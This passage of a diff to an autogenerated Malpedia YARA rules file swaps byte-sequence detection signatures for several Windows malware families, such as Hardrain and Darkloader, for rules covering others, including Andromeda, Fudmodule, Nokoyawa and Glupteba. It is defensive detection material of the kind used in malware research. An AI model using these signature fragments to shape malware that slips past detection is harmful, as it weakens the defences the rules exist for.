-		$sequence_0 = { 51 8bc8 e8???????? c645fc08 8d4d8c 8b75a0 83fe10 }
-		$sequence_1 = { 8bc8 85c9 0f8462070000 8b01 ff500c 83c010 8945a0 }
-		$sequence_2 = { b802000000 e9???????? d9ee 84cd 0f84e2ba0000 d9e0 }
-		$sequence_3 = { 84c0 0f8496000000 8b45ec 81780424499204 0f849f000000 8b38 8945e4 }
-		$sequence_4 = { 38450b 0f45c2 0bc8 890e 8bc7 5f 5e }
-		$sequence_5 = { e8???????? 8bc8 85c9 0f84f2030000 8b01 8b400c ffd0 }
-		$sequence_6 = { c745d40f000000 c645c000 8b55ec 83fa10 0f8221060000 8b4dd8 42 }
-		$sequence_7 = { 56 8b7508 8bd9 57 85f6 7832 8b3b }
-		$sequence_8 = { 50 e8???????? 8b75e4 807e0d00 750e 8d4610 50 }
-		$sequence_9 = { c645fc1c e9???????? 52 51 e8???????? 83c408 e9???????? }
+		$sequence_0 = { 8bf8 3bfb 0f840efdffff 3bf3 7408 8b06 6a01 }
+		$sequence_1 = { 7e1c 57 ffd3 8b4c2414 83c404 8d0c49 }
+		$sequence_2 = { 8a542414 83e207 668910 8b7c241c 8bcf e8???????? 8bcf }
+		$sequence_3 = { b801000000 5b 81c404280000 c3 5f 33c0 }
+		$sequence_4 = { 8d7c2415 c644241400 f3ab 8bb42418040000 6a04 }
+		$sequence_5 = { 33c0 53 8944240f 56 57 33db 8944241b }
+		$sequence_6 = { 89743c20 81c700010000 6a00 8d442420 57 50 6a00 }
+		$sequence_7 = { 85c0 74d4 8b442410 8bcf 50 e8???????? }
+		$sequence_8 = { 6a01 8d4c2424 c744243c00000000 c644241c00 c744241d00000000 }
+		$sequence_9 = { 64a100000000 6aff 68???????? 50 b820410000 }
 
 	condition:
-		7 of them and filesize < 832512
+		7 of them and filesize < 221184
 }
-rule MALPEDIA_Win_Chiser_Client_Auto : FILE
+rule MALPEDIA_Win_Broomstick_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f565e008-ef7c-5843-a15a-c3b17611be9c"
+		id = "ac676bf4-a9fb-5087-a5ff-f584bac2c26e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chiser_client"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.chiser_client_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.broomstick"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.broomstick_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "4cf569331733e568f50794a1dc9bdd96595cb2c255defe55202f75e9deeee12b"
+		logic_hash = "f03767b95c94bb52a9880746cdaa45b8005de1fc3a428f79c36aad1a9accc086"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99740,32 +99737,32 @@ rule MALPEDIA_Win_Chiser_Client_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48895c2408 48896c2410 4889742418 48897c2420 4156 0fb605???????? 488d7222 }
-		$sequence_1 = { 4d8bf0 4c8bfa 488bf9 488b5908 48895c2448 488bcb e8???????? }
-		$sequence_2 = { 8364242800 488d05e895feff 4889442430 488d4c2420 e8???????? 4c396b08 }
-		$sequence_3 = { 48894a08 488d4808 e8???????? 488d055da00100 488903 }
-		$sequence_4 = { c705????????090400c0 c705????????01000000 c705????????01000000 b808000000 486bc000 488d0dae5e0400 }
-		$sequence_5 = { e8???????? b876000000 668945b7 488d55b7 488d4dd7 e8???????? b861000000 }
-		$sequence_6 = { c7452700000000 e8???????? 4889451f 488d05d0e20100 48894517 4883653700 c6454700 }
-		$sequence_7 = { 488b4c2478 4885c9 740b ff15???????? 4c89742478 488b4d88 4885c9 }
-		$sequence_8 = { 4c8d0d82ac0200 8bda 4c8d0571ac0200 488bf9 488d15c7a60200 b908000000 }
-		$sequence_9 = { 4883ec20 488bd9 488bc2 488d0dd9150200 48890b 488d5308 33c9 }
+		$sequence_0 = { c7471400000000 8b5610 8b4b10 8955f0 894dec 8d0411 8945f8 }
+		$sequence_1 = { 8b5dd8 ff00 33f6 8b00 0fb608 }
+		$sequence_2 = { e9???????? c3 8d8d00ffffff e9???????? 8d8d78ffffff }
+		$sequence_3 = { 8bce ff15???????? 8bcf ffd6 8b8528ffffff }
+		$sequence_4 = { eb1a 56 53 57 e8???????? 668b4510 }
+		$sequence_5 = { b8???????? e9???????? 8d8dfcfeffff e9???????? 8d8dfcfeffff e9???????? }
+		$sequence_6 = { 3bf7 7cdb 5f 5e 5b }
+		$sequence_7 = { 50 e8???????? 8d4d90 e8???????? e9???????? 8b07 }
+		$sequence_8 = { e9???????? 8b8510ffffff 8b00 8b7018 8d45a8 }
+		$sequence_9 = { 85c0 7425 8d3c40 03ff 83ef06 8bd3 }
 
 	condition:
-		7 of them and filesize < 714752
+		7 of them and filesize < 1016832
 }
-rule MALPEDIA_Win_Hardrain_Auto : FILE
+rule MALPEDIA_Win_Tinyfluff_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1a6618b8-7c70-57f8-b6a6-f8de7a4fa76c"
+		id = "7516ef27-cc3c-50fb-887e-45b6927b546c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hardrain"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hardrain_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyfluff"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tinyfluff_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "04e06a92a16a529e591abeaa4beba2487be2e1ac947f5b4db02fe0ee80e8f06b"
+		logic_hash = "e68e7d6c227d4701d78eb91cd8fa16d542e11d322177ea0064fd63e81ec16ac3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99779,32 +99776,32 @@ rule MALPEDIA_Win_Hardrain_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33f6 57 85db 8bf9 763f 8b6c2414 68b4000000 }
-		$sequence_1 = { 8bf1 7431 803802 752c 8a4826 83c026 80f920 }
-		$sequence_2 = { 0f85a4000000 50 50 50 56 ff15???????? }
-		$sequence_3 = { 743a 6a16 8d4c241c 55 }
-		$sequence_4 = { 50 6a00 6a00 51 53 89742430 c744242c01000000 }
-		$sequence_5 = { 6a0c 52 56 89442418 894c2414 }
-		$sequence_6 = { 68???????? 56 e8???????? 83c414 85c0 75de 68b4000000 }
-		$sequence_7 = { 6aff 51 ff15???????? 33c0 81c4540c0000 }
-		$sequence_8 = { 5d b801000000 5b 59 c20400 8b4c2410 895910 }
-		$sequence_9 = { ff15???????? 8bf0 83feff 0f8493000000 8d442408 }
+		$sequence_0 = { 52 51 e8???????? 83c408 8b54247c 33c0 }
+		$sequence_1 = { 8a5de3 8b049550704100 885c012e 8b049550704100 804c012d04 46 }
+		$sequence_2 = { 8b04bd50704100 f644032801 7444 837c0318ff 743d e8???????? }
+		$sequence_3 = { 0f876d010000 52 51 e8???????? 83c408 33c0 }
+		$sequence_4 = { 83e03f 6bc838 894de0 8b049d50704100 }
+		$sequence_5 = { 6af6 ff15???????? 8b04bd50704100 834c0318ff 33c0 eb16 }
+		$sequence_6 = { 8b4c2450 8d145502000000 8bc1 81fa00100000 }
+		$sequence_7 = { 57 8d3c85506d4100 8b07 83ceff 3bc6 742b }
+		$sequence_8 = { e8???????? 8b404c 83b8a800000000 750e 8b04bd50704100 807c302900 }
+		$sequence_9 = { 8b4c2468 8d145502000000 8bc1 81fa00100000 7214 8b49fc }
 
 	condition:
-		7 of them and filesize < 368640
+		7 of them and filesize < 245760
 }
-rule MALPEDIA_Win_Darkloader_Auto : FILE
+rule MALPEDIA_Win_Redshawl_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c6586d19-c9dc-5391-af52-9dc3a3375338"
+		id = "d449834a-6ec8-5065-8b96-a5a49ffb3034"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darkloader_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redshawl"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.redshawl_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "80ad8615edb3b8dd04cf4b30a3f3c46ec7df78cf02d75573629255acdb077233"
+		logic_hash = "b20acd5fb5af80ab78c14cd6c74a0396c69511a94b51759668c7b067e28aed11"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99818,34 +99815,34 @@ rule MALPEDIA_Win_Darkloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { a5 a5 a5 a4 33f6 85ed }
-		$sequence_1 = { 8b4c2410 c6040b25 0fb6043e c1e804 8a440414 }
-		$sequence_2 = { 2bce 741d 803c3a5c 7504 }
-		$sequence_3 = { 880416 42 3b5510 7cf4 5e 5d }
-		$sequence_4 = { 50 ff15???????? 56 ff15???????? 8b35???????? 8d4508 }
-		$sequence_5 = { 68???????? eb38 8d042f 50 e8???????? }
-		$sequence_6 = { 88040a 41 84c0 75f6 ff742410 46 83ef80 }
-		$sequence_7 = { 8b442418 8b7c2414 ff7024 55 }
-		$sequence_8 = { 46 3bf5 7c8e 5f }
-		$sequence_9 = { a3???????? 5e c3 55 8bec 81ec04040000 33c9 }
+		$sequence_0 = { 0f84b3020000 e8???????? 33db 488d54245c 488b88c0000000 488d0563860000 }
+		$sequence_1 = { 8bb424a0000000 448bc6 8bd7 488d0d12990000 }
+		$sequence_2 = { 742e 488d1596a10000 488bcf ff15???????? 488d156ea10000 }
+		$sequence_3 = { e8???????? 4c8d546d00 4c8d1d58c70000 49c1e204 bd04000000 4f8d442a10 498bc8 }
+		$sequence_4 = { e8???????? 488d1568ba0000 413bc7 7428 83f8fe 7423 }
+		$sequence_5 = { 488d0529c20000 483bf8 740e 833f00 7509 }
+		$sequence_6 = { 4883ec30 b84d5a0000 663905dad9ffff 7404 33db eb38 }
+		$sequence_7 = { 7577 b801000000 ff05???????? f743180c010000 7563 4c8d251ac70000 4863f8 }
+		$sequence_8 = { 33d2 8d4a02 ffd0 4c8be0 4889442430 }
+		$sequence_9 = { 0f8584010000 8a0b 33c0 80f90a 0f94c0 8944244c 488d0502860000 }
 
 	condition:
-		7 of them and filesize < 124928
+		7 of them and filesize < 174080
 }
-rule MALPEDIA_Win_Andardoor_Auto : FILE
+rule MALPEDIA_Win_Andromeda_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "81ba1768-aed9-5f8c-98e2-be1a91393599"
+		id = "1eaf3713-eaf3-56ba-93e1-406275c53353"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.andardoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.andardoor_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.andromeda_auto.yar#L1-L304"
 		license_url = "N/A"
-		logic_hash = "f5bb44cfeb5e0f7e950fe93babcfa1fb8b5f0313142a54c4e5fa92021682222b"
+		logic_hash = "9e39961b4372e3bc922b40be7e1f53c18cfcecc85e79e89fe6975047795ee278"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -99857,32 +99854,54 @@ rule MALPEDIA_Win_Andardoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48895c2430 895c2428 c744242001000000 c745bc01010000 }
-		$sequence_1 = { 3bc3 7d15 4863d3 41b842000000 488bcf ff15???????? }
-		$sequence_2 = { e8???????? 84c0 7414 85ff 7e10 448bc7 }
-		$sequence_3 = { 48ffc3 48ffc1 8803 84c0 75f2 33ff 807d8000 }
-		$sequence_4 = { 7505 4032ff eb1f 85db }
-		$sequence_5 = { 41b880000000 e8???????? 4533c9 4c8d442430 }
-		$sequence_6 = { 448935???????? b932000000 ff15???????? 4439742440 0f86f5000000 }
-		$sequence_7 = { 41be01000000 4889bc2410040000 4585f7 0f84c6010000 }
-		$sequence_8 = { 6685c0 75e7 33d2 488d8d50040000 41b880000000 e8???????? }
-		$sequence_9 = { 4883c002 4883f80a 75d6 e8???????? 488b4b08 4885c9 7405 }
+		$sequence_0 = { ebcf 33c0 33db 33c9 33d2 }
+		$sequence_1 = { 368a942800ffffff 02da 368ab42b00ffffff 3688b42800ffffff }
+		$sequence_2 = { fc 33c0 8b7508 33db 368a942900ffffff 02c2 }
+		$sequence_3 = { 3688b42800ffffff 3688942b00ffffff 02d6 81e2ff000000 }
+		$sequence_4 = { 41 3b4d14 75c3 61 }
+		$sequence_5 = { 8d7dfc b8fcfdfeff fd ab 2d04040404 e2f8 fc }
+		$sequence_6 = { 368a942900ffffff 02c2 020433 368ab42800ffffff 3688b42900ffffff 3688942800ffffff fec1 }
+		$sequence_7 = { 81c400ffffff 60 b940000000 8d7dfc b8fcfdfeff fd }
+		$sequence_8 = { 60 e8???????? 5d 81ed???????? 33c9 }
+		$sequence_9 = { 50 e8???????? 83c40c 6800000100 e8???????? }
+		$sequence_10 = { 85ca 7404 0420 8806 }
+		$sequence_11 = { 0f9ec1 33d2 3c41 0f9dc2 85ca 7404 }
+		$sequence_12 = { 8a06 33c9 3c5a 0f9ec1 33d2 }
+		$sequence_13 = { 0fb64601 84c0 7905 0d00ffffff }
+		$sequence_14 = { 6a30 8d45d0 50 6a01 ff7508 }
+		$sequence_15 = { 56 6800010400 56 56 56 ff750c }
+		$sequence_16 = { e8???????? 8945fc 83f800 0f8476010000 6804010000 6a00 }
+		$sequence_17 = { ff35???????? e8???????? 8945f8 83f800 0f8458010000 6804010000 ff75f8 }
+		$sequence_18 = { f3aa 6a00 6a00 ff75f0 e8???????? c7459c44000000 }
+		$sequence_19 = { a3???????? 6804010000 6a00 ff35???????? e8???????? }
+		$sequence_20 = { 68???????? 6801000080 e8???????? 83f800 }
+		$sequence_21 = { ff75fc 6a00 e8???????? 6a00 ff75f8 ff75fc e8???????? }
+		$sequence_22 = { e8???????? 6a06 ff75f8 e8???????? 8d45f4 50 }
+		$sequence_23 = { 83f8ff 7457 33c0 8d7d9c }
+		$sequence_24 = { 8b45ec 8b55fc 8b0490 81f683073af8 81e7d889e666 8945f8 }
+		$sequence_25 = { 81fe50f639e3 0f84a2f7ffff 81455886080000 69ffc520db89 ff5518 }
+		$sequence_26 = { 69f676ce078f 81ef4b9d0e76 81ff901d63a9 0f84f1010000 8b4544 }
+		$sequence_27 = { 0f856afeffff e9???????? 55 8bec 83ec24 53 56 }
+		$sequence_28 = { 8bd8 ff5630 8bf8 ff560c 23d8 ff5638 }
+		$sequence_29 = { 69ffbb3de4b4 d1e8 81f679b291d1 894544 3d80000000 7363 }
+		$sequence_30 = { 03c1 8b4df0 0fb609 03ca 81e1ff000000 }
+		$sequence_31 = { 8b456c 8b4018 894560 81c3b6dd7f19 ff5634 0faff8 }
 
 	condition:
-		7 of them and filesize < 339968
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Waterspout_Auto : FILE
+rule MALPEDIA_Win_Fudmodule_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "312b289d-c89a-504c-8e5c-23fd2356f776"
+		id = "bbb969f6-fc21-5df2-98a0-24465f1a52fb"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterspout"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.waterspout_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fudmodule"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fudmodule_auto.yar#L1-L172"
 		license_url = "N/A"
-		logic_hash = "ca34650795bef65f517e7b6e56e86508cb7b6332fa50178472230b7d745dfa16"
+		logic_hash = "3c836db347337427da5b8480cbffb4c9a34ff35d9d7cf56625d940236b49e08c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99896,32 +99915,38 @@ rule MALPEDIA_Win_Waterspout_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 3bf3 0f8481000000 8d4c2418 8d54240c 51 53 }
-		$sequence_1 = { 61 8b4508 48 894508 7596 5f 5e }
-		$sequence_2 = { 68???????? 6a64 e8???????? 83c408 8b0d???????? 8d44242c }
-		$sequence_3 = { 53 8b5c240c 56 8b74240c 3bf3 7414 }
-		$sequence_4 = { f2ae f7d1 49 83f931 7607 }
-		$sequence_5 = { 5b c3 8b54241c 8b35???????? 3bdf }
-		$sequence_6 = { 89442428 c1f808 88442413 8b02 2b44241c 83f801 7706 }
-		$sequence_7 = { b8f41f0000 e8???????? 53 55 }
-		$sequence_8 = { 8844240e 8844240f 8d442400 50 8b442418 }
-		$sequence_9 = { 8d7c241c 6804010000 f3ab b9fc070000 8dbc24a0230000 f3ab }
+		$sequence_0 = { 3446 4839eb f9 f5 }
+		$sequence_1 = { c7451079737465 c745146d496e66 c745186f726d61 c7451c74696f6e c6452000 c745c04e745772 c745c469746556 }
+		$sequence_2 = { 4585ed 0f8416010000 488d3cb0 ff15???????? 488d542448 488bc8 488d442460 }
+		$sequence_3 = { eb20 4c8d25c0e00000 488b0d???????? bf01000000 897c2460 ff15???????? 4c8be8 }
+		$sequence_4 = { c745ae6e006500 66897db2 c745b453007900 c745b873007400 }
+		$sequence_5 = { 488d3ca51c3489c2 0f8f7cf20100 660fbdfe 4801e3 66c1d707 66f7c74b20 }
+		$sequence_6 = { 29d2 c0c804 89d0 24a6 4883c701 }
+		$sequence_7 = { 488b05???????? 4833c4 48894527 33c0 4533ed 4c8bf1 458d4504 }
+		$sequence_8 = { 0f87833b0200 0fa3d5 f9 f5 69d20a000000 }
+		$sequence_9 = { 660fa3e0 29d9 6629ce 660fbcf6 }
+		$sequence_10 = { 488d442438 4d8bc4 4889442420 41ff96d00d0000 ba4d5a0000 663955a0 }
+		$sequence_11 = { c744246c69006c00 c744247065005300 66898552010000 c744247673007400 c744247a65006d00 }
+		$sequence_12 = { 38e9 30c0 f9 f2ae 0f89bb620100 }
+		$sequence_13 = { 418d5d08 bf80250000 660f1f840000000000 488d4c2460 33d2 41b800020000 }
+		$sequence_14 = { fec8 f6c65a fec0 b02e 80fec3 }
+		$sequence_15 = { 4829fb 66ffc7 d2f8 66ffcf f8 4801e3 660fadd7 }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 795648
 }
-rule MALPEDIA_Win_Common_Magic_Auto : FILE
+rule MALPEDIA_Win_Nokoyawa_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "01685495-e500-52ed-8d28-52ffda64d4ce"
+		id = "41b1b168-b0ea-5f04-84cd-fd90bfa48e03"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.common_magic"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.common_magic_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokoyawa"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nokoyawa_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "f088c9c6d83029098f6560147761ea146208530ef1a48657d7b10a76113354f7"
+		logic_hash = "a5e2c231f7d7eec8e19a418805bfeaea862c56b36ec030240db4e6a8dee84747"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99935,32 +99960,32 @@ rule MALPEDIA_Win_Common_Magic_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83e805 7415 83e801 0f8595010000 c745e488424100 e9???????? }
-		$sequence_1 = { 83c008 5d c3 8b04c5240e4100 5d c3 8bff }
-		$sequence_2 = { 83c408 83f908 7235 8b955cffffff 8d0c4d02000000 8bc2 }
-		$sequence_3 = { c70000000000 33c9 c7401000000000 c7401400000000 0f1085acfdffff }
-		$sequence_4 = { e8???????? 8b0f 83c408 85c9 7454 8b5704 }
-		$sequence_5 = { 66891448 53 ff15???????? 8bc6 8b4df4 64890d00000000 59 }
-		$sequence_6 = { 8934b8 8bc7 83e03f 6bc838 8b049570804100 }
-		$sequence_7 = { 8d3400 8985bcfdffff 56 8d85e8fdffff 50 8d85acfdffff 50 }
-		$sequence_8 = { 660f1f840000000000 83bd40ffffff08 8d8d2cffffff 8bf7 0f438d2cffffff 837f1408 }
-		$sequence_9 = { 8d45b4 c745b45368656c 50 56 c745b86c457865 c745bc63757465 }
+		$sequence_0 = { 4883e1c0 488b542470 488d4c0a20 488b542470 4883c220 4889542440 448bc0 }
+		$sequence_1 = { c744246820000000 c744246c6b000000 c744242000000000 eb0b 8b442420 83c014 }
+		$sequence_2 = { 890424 8b0424 d1e0 8b0c24 c1e91f 0bc1 89442474 }
+		$sequence_3 = { c1e902 0bc1 8944240c 33c0 85c0 0f853effffff b804000000 }
+		$sequence_4 = { 488b442408 48ffc0 4889442408 0fb60424 83f861 7c0a 0fb60424 }
+		$sequence_5 = { c1e91f 0bc1 89842450010000 b804000000 486bc00a 8b8c2450010000 }
+		$sequence_6 = { 0bc1 89442410 33c0 85c0 0f853cffffff b804000000 486bc005 }
+		$sequence_7 = { c744242000000000 4c8b0d???????? 4c8d058f030000 33d2 }
+		$sequence_8 = { 33c0 85c0 0f8528ffffff b804000000 486bc008 }
+		$sequence_9 = { e9???????? 0fb6442421 85c0 7419 8b442424 33c9 488b542438 }
 
 	condition:
-		7 of them and filesize < 212992
+		7 of them and filesize < 92160
 }
-rule MALPEDIA_Win_Ascentloader_Auto : FILE
+rule MALPEDIA_Win_Rc2Fm_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "52e48a17-f763-5fcc-946a-031eef291a19"
+		id = "e03b7b3c-48a1-54e0-8e6b-e042d3ac2eec"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ascentloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ascentloader_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rc2fm"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rc2fm_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "47183e13937994500473836e864be558b3709bce2edd5ef734fa1f084094231f"
+		logic_hash = "fde85b529d09d7ff1cf9ced9923a8b91413b0ceeff762a4b8cd7ea6f3c6fcfbf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99974,32 +99999,32 @@ rule MALPEDIA_Win_Ascentloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d44244c 50 ffd7 8d3c03 }
-		$sequence_1 = { 33c0 66894de0 66894de6 51 8d4dc4 }
-		$sequence_2 = { 83c414 85c0 0f84a3010000 817c243400040000 8b5c2410 0f8388010000 85f6 }
-		$sequence_3 = { 59 8d8dfcfdffff e8???????? b901020000 }
-		$sequence_4 = { 5d c3 b8???????? e8???????? 81eca0060000 53 56 }
-		$sequence_5 = { 740f 56 ff15???????? 8b4df4 03c8 }
-		$sequence_6 = { 56 ff15???????? 8bce e8???????? e8???????? 85c0 743f }
-		$sequence_7 = { 6800800000 53 ff7604 ff15???????? 5b 8bce 5e }
-		$sequence_8 = { 8b7508 c7465cc0064100 83660800 33ff }
-		$sequence_9 = { 56 8b5004 8b00 57 }
+		$sequence_0 = { 4d8bce 4c2b4e08 4533c0 33d2 488bcb 4c03c8 897c2428 }
+		$sequence_1 = { 48b8bd427ae5d594bfd6 48034c2450 41b903000000 4533c0 c744242808000000 48895c2420 48f7e1 }
+		$sequence_2 = { 488d451f 48899c24c0000000 33db 41b93f000f00 4533c0 4c89a42488000000 4889442420 }
+		$sequence_3 = { 03c1 46011c08 4883c202 49ffca 75c3 418b4004 4c03c0 }
+		$sequence_4 = { 488bcb e8???????? eb62 488d151bf9ffff 4c8bc3 e8???????? 84c0 }
+		$sequence_5 = { 66894503 0fb64500 4c897c2420 66894501 0fb645ff 668945ff ff15???????? }
+		$sequence_6 = { 894158 488b4168 66893c50 8b5174 488b4968 8d1455feffffff e8???????? }
+		$sequence_7 = { 41b808020000 4889b42488000000 ff15???????? 488bf0 4885c0 0f84b6010000 }
+		$sequence_8 = { ba0a000500 b900000100 448bc0 e8???????? 488b4c2450 488b01 ff5010 }
+		$sequence_9 = { ff15???????? 488bd8 4883f8ff 742d 33d2 488bc8 ff15???????? }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 410624
 }
-rule MALPEDIA_Win_Unidentified_109_Auto : FILE
+rule MALPEDIA_Win_Glupteba_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d4a6c411-a7e9-5954-916e-935ded59522f"
+		id = "d40588ac-e7a2-58c9-9ca8-ed52b13d9b71"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_109"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_109_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.glupteba_auto.yar#L1-L160"
 		license_url = "N/A"
-		logic_hash = "758f313f75d70626faf4a10de9d767fa1ab2c47be3c297f5f181d9298dc68601"
+		logic_hash = "aabdfe0b9a7f1b7f6f6d9d5fd0bc40fb64823f7ef8d103971b20ab4de2b081ab"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100013,32 +100038,38 @@ rule MALPEDIA_Win_Unidentified_109_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48039790020000 e8???????? 428d0433 488b5c2460 898798020000 2bc6 85ed }
-		$sequence_1 = { 0f8546020000 e9???????? 488d542420 488d4c2420 e8???????? 8bd8 c744242800000000 }
-		$sequence_2 = { 488b4210 416bf81c 83ef1c 428b5480fc 85d2 740d }
-		$sequence_3 = { 488978d8 8978e0 8b4208 458d4a01 8bef 394108 }
-		$sequence_4 = { 85c0 0f8562fdffff 488b4710 488b4808 0fb68776020000 8801 488b4710 }
-		$sequence_5 = { 4833c8 4823cd 4833ca 48c1c120 498948f8 49ffc9 75b6 }
-		$sequence_6 = { 8d5883 e9???????? 448b6d97 c6879803000001 c7456701000000 4585ed 0f8e3c020000 }
-		$sequence_7 = { 0f8747040000 418bc0 803c1830 0f853a040000 418d4901 418bd4 3bcd }
-		$sequence_8 = { 41ffc8 75ed eb04 410fb6c8 8d040a 413bc3 0f877c010000 }
-		$sequence_9 = { 80b97502000001 7304 3cfe 7517 488b8950090000 488d542430 }
+		$sequence_0 = { 50 ff15???????? 8d45d4 50 e8???????? 50 8d45d4 }
+		$sequence_1 = { 0fb6c8 8bc1 c1e804 0bc1 40 d1f8 }
+		$sequence_2 = { 83c0fc 33c9 85c0 7e0e 813c310d0a0d0a 7409 }
+		$sequence_3 = { ff15???????? ff75ee ff15???????? 830bff ff45fc 8b45fc }
+		$sequence_4 = { 50 68???????? e8???????? 83c420 e8???????? 5f 5e }
+		$sequence_5 = { eb02 8a03 8807 47 }
+		$sequence_6 = { 0bca 8b55fc c1ea07 c1e109 8d1c3f 0bd3 }
+		$sequence_7 = { c1eb08 33f3 8b5dfc 33df }
+		$sequence_8 = { 0106 830702 392e 75a0 }
+		$sequence_9 = { 00cd 3e46 005e3e 46 }
+		$sequence_10 = { 0012 3f 46 008bff558bec }
+		$sequence_11 = { 0107 eb4d 8b02 89442418 }
+		$sequence_12 = { 005e3e 46 00ff 3e46 }
+		$sequence_13 = { 00ff 3e46 0012 3f }
+		$sequence_14 = { 0101 03d3 8b4620 8bcb }
